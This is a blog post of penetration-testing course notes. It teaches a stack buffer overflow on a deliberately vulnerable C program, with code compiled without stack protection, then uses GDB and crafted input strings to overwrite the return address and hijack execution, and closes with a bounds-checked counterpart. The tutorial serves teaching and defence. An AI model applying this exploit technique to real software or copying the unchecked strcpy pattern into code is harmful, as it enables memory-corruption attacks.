Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary

x86 General Purpose Registers

EIP - instruction pointer
ESP - stack pointer
EBP - base pointer
ESI - source index
EDI - destination index
EAX - accumulator
EBX - base
ECX - counter
EDX - data

Sample of Vulnerable Code (C)

overflowtest.c:

    #include <stdio.h>
    #include <string.h>

    void overflowed() {
        printf("%s\n", "Execution Hijacked");
    }

    void function1(char *str) {
        char buffer[5];
        strcpy(buffer, str);   /* no bounds check: copies until the source's NUL byte */
    }

    void main(int argc, char *argv[]) {
        function1(argv[1]);
        printf("%s\n", "Executed normally");
    }

Vulnerability:
(1) strcpy does not perform bounds checking.
(2) strcpy is used to copy user input into a fixed-size variable (a 5-byte buffer).
Therefore, if we give it more data than the variable can hold, the copy continues into adjacent memory addresses.

Compiling Program
    gcc -fno-stack-protector -o overflowtest overflowtest.c

*-fno-stack-protector turns off the stack cookie (the canary GCC places between local buffers and the saved EBP/return address), so the overwrite below is not detected at function return.

Execution:

    ./overflowtest AAAA    /* Executed normally */

Overflowing Buffer with strcpy:

    ./overflowtest AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    /* Segmentation fault */

*Overwrites saved EBP and saved return pointer
*Overwrites any additional space in function1's stack frame
*When it runs out of space in the frame, it keeps copying data into adjacent memory addresses

GDB commands:

    (gdb) list 1,16          [lists source code]
    (gdb) break 10           [sets a breakpoint on line 10]
    (gdb) break 14           [sets a breakpoint on line 14]
    (gdb) break 11           [sets a breakpoint on line 11]
    (gdb) run AAAA           [runs the program in GDB]
    (gdb) info registers
    (gdb) x/20xw $esp        [memory at ESP]
    (gdb) x/xw $ebp          [memory at EBP]
    (gdb) continue
    (gdb) x/20xw $esp
    (gdb) x/xw $ebp

So What is This?
Between function1's and main's stack frames there are four bytes:
0x08048494 -> AAAA

    (gdb) disass main        [disassemble the main function]
    (gdb) continue
    (gdb) run ABCD
    (gdb) continue
    (gdb) continue
    (gdb) x/20xw $esp
    (gdb) x/xw $ebp
    0x4104a000 0x00444342

A=41 B=42 C=43 D=44

Endianness
Which byte gets loaded first. Intel arch is little endian.

    (gdb) run $(python -c 'print "A" * 30')
    (gdb) x/20xw $esp
    (gdb) x/xw $ebp
    (gdb) continue
    Program received signal SIGSEGV, Segmentation fault.

    (gdb) run $(python -c 'print "A" * 17 + "B" * 4')
    (gdb) x/20xw $esp
    (gdb) x/xw $ebp
    (gdb) continue
    Program received signal SIGSEGV, Segmentation fault.

    (gdb) disass overflowed  [redirecting execution]
    (gdb) run $(perl -e 'print "A" x 17 . "\x08\x04\x84\x4d"')
    (gdb) x/20xw $esp
    (gdb) x/xw $ebp
    (gdb) continue
    Program received signal SIGSEGV, Segmentation fault.
    0x4d840408 in ?? ()

Now, we account for endianness.

    (gdb) run $(python -c 'print "A" * 17 + "\x4d\x84\x04\x08"')    [flip the bytes to account for endianness]
    (gdb) x/20xw $esp
    (gdb) x/xw $ebp
    (gdb) continue
    Continuing.
    Execution Hijacked
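As an added example (not code from the course or from this post), the two points above side by side: a bounds-checked counterpart of function1() that refuses input which would not fit in the 5-byte buffer, and a helper that shows the little-endian byte order the final run command depends on. The function names safe_copy, to_little_endian and from_little_endian are my own; the value 0x0804844d is the byte string from the page's run command read back as a 32-bit address.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Hardened counterpart of function1(): copy into a fixed buffer only when the
   whole string plus its terminating NUL fits, and report failure instead of
   writing past the end of dst.  Returns 1 on success, 0 if the input is rejected. */
int safe_copy(char *dst, size_t dst_size, const char *src) {
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size) {
        return 0;                  /* would need len + 1 bytes: refuse to copy */
    }
    memcpy(dst, src, len + 1);     /* length is known to fit, NUL included */
    return 1;
}

/* Little endian: the least significant byte is stored at the lowest address.
   Writes the four bytes of value into out[0..3] in the order the CPU stores them. */
void to_little_endian(uint32_t value, unsigned char out[4]) {
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Reads four bytes back into a value using the same order, i.e. what the CPU
   sees when it loads a saved return address from the stack. */
uint32_t from_little_endian(const unsigned char in[4]) {
    return (uint32_t)in[0]
         | ((uint32_t)in[1] << 8)
         | ((uint32_t)in[2] << 16)
         | ((uint32_t)in[3] << 24);
}

int main(int argc, char *argv[]) {
    char buffer[5];                                 /* same size as in overflowtest.c */
    const char *input = argc > 1 ? argv[1] : "AAAA"; /* constructed default input */

    if (safe_copy(buffer, sizeof buffer, input)) {
        printf("copied: %s\n", buffer);
    } else {
        printf("rejected: %zu bytes do not fit in a %zu-byte buffer\n",
               strlen(input), sizeof buffer);
    }

    /* Address derived from the page's "\x08\x04\x84\x4d" byte string */
    unsigned char bytes[4];
    to_little_endian(0x0804844dU, bytes);
    printf("0x0804844d in memory: %02x %02x %02x %02x\n",
           bytes[0], bytes[1], bytes[2], bytes[3]);
    return 0;
}
```

Running it with a 5-character or longer argument prints the rejection message instead of crashing, and the second line shows why the bytes in the run command have to be written in reverse: the low byte 4d is stored first.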
Author: Vitali Kremez
July 2016